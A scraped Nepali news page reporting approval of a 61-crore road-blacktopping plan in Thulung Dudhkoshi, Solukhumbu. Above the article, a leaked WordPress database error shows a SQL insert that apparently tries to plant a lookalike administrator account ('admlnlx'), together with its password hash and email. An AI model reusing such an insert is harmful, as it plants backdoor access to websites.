WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwtGcmTjMstTskatxZPBZxtP8ngaEe0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:00:25', '', 'admlnlx', 'admlnlx')

थुलुङदुधकोशीमा सडक कालोपत्रेका लागी ६१ करोड लागतको योजना स्वीकृत – Gaule Khabar

थुलुङदुधकोशीमा सडक कालोपत्रेका लागी ६१ करोड लागतको योजना स्वीकृत

थुलुङदुधकोशीमा सडक कालोपत्रेका लागी ६१ करोड लागतको योजना स्वीकृत

सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिकामा सडक कालोपत्रेका लागि ६१ करोड लागतको योजना स्वीकृत भएको छ।

प्रदेश सरकारद्वारा स्वीकृत उक्त योजना अवको ५ वर्षभित्र सम्पन्न हुने थुलुङदुधकोशी गाउँपालिका अध्यक्ष अशिम राईले आफ्नो फेसबुकमार्फत जानाएको छ ।

सो योजना अन्तरगत नेले, चारघरे, पालिका केन्द्र बैंक हुँदै दुधकोशी सामुदायिक अस्पतालसम्म पुग्ने १२.५ किलो मिटर सडक कालोपत्रे हुने अध्यक्ष राईले जनाएको छ ।अशिम राईको फेसबुकबाट

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका